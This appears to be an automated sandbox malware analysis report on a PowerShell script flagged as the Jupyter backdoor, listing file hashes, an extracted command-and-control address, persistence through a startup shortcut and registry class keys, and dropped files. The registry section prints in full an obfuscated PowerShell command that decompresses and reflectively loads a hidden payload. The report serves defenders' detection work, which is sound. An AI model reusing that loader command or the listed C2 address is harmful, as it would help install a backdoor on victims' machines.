Analysis
-
max time kernel
642s -
max time network
653s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
13-04-2023 14:26
Static task
static1
General
-
Target
script.ps1
-
Size
28KB
-
MD5
5201bec05304172eb34578a483da40da
-
SHA1
e4a91fd21e16639f759009a17e1f37df5c89f2b4
-
SHA256
5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458
-
SHA512
7ea8de19029a90502fd6a472e1b449cdbf017a19e679d3383b34aea2af1e392de6216934640fd9d8c47fb8553759cde0880291ff2d187081ff9896746a276353
-
SSDEEP
768:gPPLA+zYgibawLt4CGwmGGler9PdnH1LiGK:eT7zgbaItpdmGKyxdnViR
Malware Config
Extracted
jupyter
OC-8
http://37.221.114.23
Signatures
-
Jupyter Backdoor/Client payload 1 IoCs
resource yara_rule behavioral1/memory/4452-362-0x000001C9471E0000-0x000001C9471F2000-memory.dmp family_jupyter -
Blocklisted process makes network request 21 IoCs
flow pid Process 2 4452 powershell.exe 8 4452 powershell.exe 9 4452 powershell.exe 11 4452 powershell.exe 12 4452 powershell.exe 13 4452 powershell.exe 14 4452 powershell.exe 15 4452 powershell.exe 16 4452 powershell.exe 17 4452 powershell.exe 27 4452 powershell.exe 28 4452 powershell.exe 30 4452 powershell.exe 31 4452 powershell.exe 32 4452 powershell.exe 33 4452 powershell.exe 34 4452 powershell.exe 35 4452 powershell.exe 36 4452 powershell.exe 37 4452 powershell.exe 38 4452 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk powershell.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy\ = "nfivyqigfpw" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw powershell.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\IUAhWSYnwacetBJkHpG\\JYrgHGeXzFaift.YLMrkBnbRWCVeEFGZ')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\"" powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4452 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4452 wrote to memory of 2568 4452 powershell.exe 67 PID 4452 wrote to memory of 2568 4452 powershell.exe 67 PID 2568 wrote to memory of 3576 2568 csc.exe 68 PID 2568 wrote to memory of 3576 2568 csc.exe 68
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps11⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES618D.tmp" "c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP"3⤵PID:3576
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD590f78bb940a4b01dda650b86097b948b
SHA1e3828a76059b8a7a5a197da0cde7acac6ec79c23
SHA2564c94e3efadc2a9674a3082ce77f8b5e441da143149315c15058ab37703d73ea1
SHA5127889708aea0ef18425f5b10328354b7199119f85dbc3eaef01ce2e7bbcf5019f6ab5fc75b853560c570ca315c46f0a65c3c89742b16846ad14a92dee07030eec
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD573520d2b97645d9989fb0f5bb1aba355
SHA184ece3730dcdc6ae9dc336f397f43d1ec61dbce6
SHA256d39562cabdf944a784e353b60c0e9ecbccb0102ff718aae74e0ef38b2efcdefa
SHA512478138a3b2a427d07c99aae399e79eadbeb66386f5d5dc5d8b8c2883fe8536ad3ed0583f10eed5a8254bebd863c130f19c61341f0a4a86e1387fae90949b07ba
-
Filesize
146KB
MD567502090d0cf262d4a14c19dfe69f524
SHA19b87390eed9e8afdf246e9148022244277ef5b13
SHA25607fef04ad77fe166172937b8e9e38c2a9558a5c9da152f8430e122b54e7d83de
SHA5122af2fb8620e95c04c2c6011370c6b5ee581cd91a04415a79f8f355baa59c6a682148c810a769bedd73d510c67d48921831d68fcc22c4eb8ae63ca09f7f339556
-
Filesize
133KB
MD5acb79c1192de5be950567a971a40b5b9
SHA1a19d8aad3dd2ef9560489972141be7d78e5d04b1
SHA25601b4f03cb41dc3881dd052e466b528ac7073661aeef24596f480614fa7eb8e32
SHA51288fa9bdcfa5ac8a81e36191e0bbb159b4bbd66a4f7bd26c28891bd76b68cfccb12f1989ff6772f792812d0c11ee82b9cc274a2a2ccebdf5bfde0747aaaaa593d
-
Filesize
171KB
MD527ae639baac5a409329887445c77646f
SHA18870aca8b8b0972c72f6ed23b07556ac83439558
SHA256555d9fab18e5be0bffcb8cb097286be783bf4c8479b71cc33e382743c686ed54
SHA5127434209a5e41842148d17c051c8ea17492b7949bcca5bc1334fb82f744bfbb449648f601ae805fd21efe04749d0e335c68d288add0a79566b24051096ff6e2c0
-
Filesize
172KB
MD5e2ff7820f8b7579747a670419a3aa125
SHA1c09f64cd5dc0513804d6bebcb1c8c006c73fcc82
SHA2567dabd2c07f0659c4eac0213a444e1ee2d587233858ce57edafa5ac381cb5b662
SHA512f28882cff20694499f5a44d1bb2c80a127d57a21015dd855bcc9223630095ed8410ec63a3c8441b6f4112a848fc9868e7d8ab9b1d8a5af74fa1443bae41015a1
-
Filesize
133KB
MD51139720144032052eb01c6741a039197
SHA15f1425d9261ec400d90743a91f5fe9674caa5c4d
SHA2560d3805f498980feb2c2b247990fee00b217609850bb892be1ed2af3588577434
SHA512928987d79463fdf02a65629089b7d8f8891b1e356e8e475799ec1554ef9f84bf0faa455f8fa460f87e9a6ef26510a324380e4515a11f974117e55750bb01f09a
-
Filesize
192KB
MD5a057f748414f4673fe67793265d72453
SHA1e856da5a9a93b6e7f02e9aec8459dc1b471abca3
SHA256440714233f9df4549f0a6821152a74f8fb6f31519637cbfc9c2a71692f93cc80
SHA512a27a17edee733605754fdbdee955a606d5c0544eed7e14fa6d82da83e1808ec306a67e490c4d1b140f374ecb532943048b9b7476a0ef3d7b7630014174c78121
-
Filesize
132KB
MD593035478adf3b3aafdd26edfd09b53b3
SHA179c924286ddb2e1d3f808437d777b06f061bb737
SHA256449161c6e76077628f02136ecc85b324a8a95aa59db6514607c157b7b7e3c9b1
SHA5125c56c022a828933f79c827f1cebc9111976d92454ae2b6ff5672f05bf672dcd649d852e33678bae5e5f1260152439d094cc1c1e2ba6de999bcb475e5442b72b2
-
Filesize
157KB
MD5e155224cda1a9854fe57af90bcb5b475
SHA1d8030992f15f0aba20e51bce03cfd58b0be4df88
SHA2567ca9fcf2fbbc599995b31849698b909602e8cacd501f4bfbfa3ca7d0e504b028
SHA512e00a6202a841bd1d6180a62ccade7340cb4ac1ecf7829bc64d60909f9c5ce8f8b2720155676a41833149efa586343811d9fb897fb3d504b33f25929a4a11db78
-
Filesize
89KB
MD5a30104996081729cabdca7b08655e843
SHA1dbc4fd5547f6d8c5365d7d6cca65d44647d868ba
SHA256f3e32db459cab4f0db05919cc9f0652caf6eeaeeca25af82e843c7282f473ded
SHA51268f7d7061acd8b367a7d44c9a20462621628c8d948d80c663ff8d16cba1edf7313001aec4591e39b5c7580b6dea675b673b4755915d2078886f1d85b65bf3257
-
Filesize
132KB
MD516367ac998221144710b9ffd6d031b17
SHA1699746b2bf59a22205f4882b0528190b08ada96d
SHA25614079a86451292bda035cc4cd17638b4ef4edaa4a6ced9d81b1f10a1377607de
SHA51251452d16ff6b632d8c3982a2dba2de63c6fc386010c7a6fbbfca2c93af5e47460d717296b2c940618e5b7c15314d4b419bbadfacfbe8db55fb582e22c98c21e3
-
Filesize
69KB
MD50dd9a25dc9e735a89b895f1fe87633ff
SHA191bdb2d46c6d96b97032e6726e896fcffd3fa1fb
SHA256b7a430f41cabcf2d1cc9905c7db08887a8f8861f9a98cd097762272412760ec6
SHA5121922bb2d7a371ad0b5a1470df88eb3a0b934ed1e361d0c05900f08b04d2aeb13e6cdd585ea0a2a027067572ea90e3ca4b514b01fa927e6a2e86eaf168f083f3d
-
Filesize
652B
MD5244e097abf9183ad1e323ed52c620503
SHA1be6815fe1b4930e5ccf4ea9477b61938b36f4c67
SHA2565455ec4c2d6b5f5dba18ec1d2870ec3d47ad993174f0f21e19fb0a6e502f60d6
SHA5122e61664cd3b946c133bd6dcc7adbc000dfb51f90964e0c7b6c91ca4f8fc2e683c946a3bd62c76d3237ca5f4ddd66bce277aea4dd788c10a62155d5d72ffced07
-
Filesize
236B
MD5dae076349c85f1ed8db78fd3bd75473c
SHA133be9fc7f764edae76f95fe28f452b740a75d809
SHA2569e3f4a1c1286b86413b4844e216248f1a95e8a13ee74c2c71412c2d6c571f156
SHA512ae396e869013c2c70936858646aeac2289b17c16a4f2a6b938d6d2434a30e9785e010ff3c42b9c728cd8c002ea4c8190783665f575e15962553eb7b229b9a923
-
Filesize
369B
MD5b82b3c610b1bd22fea2daca6e6fcbaea
SHA16f18be10592e3d1a4da6343ddcac726f9329ac4f
SHA25616319d856ba93120b0e55efcfe44abadc942751e8afb5956d5ddc5a535489e5e
SHA5127246e8d7b9f86dc034fa5ef5f28547c08a6f6394a8b18002b2c0dc04709aaf3d12bd42600f1c3a0d17efd410ee7f993f493eaac35d034ed60a8d566159ddddf9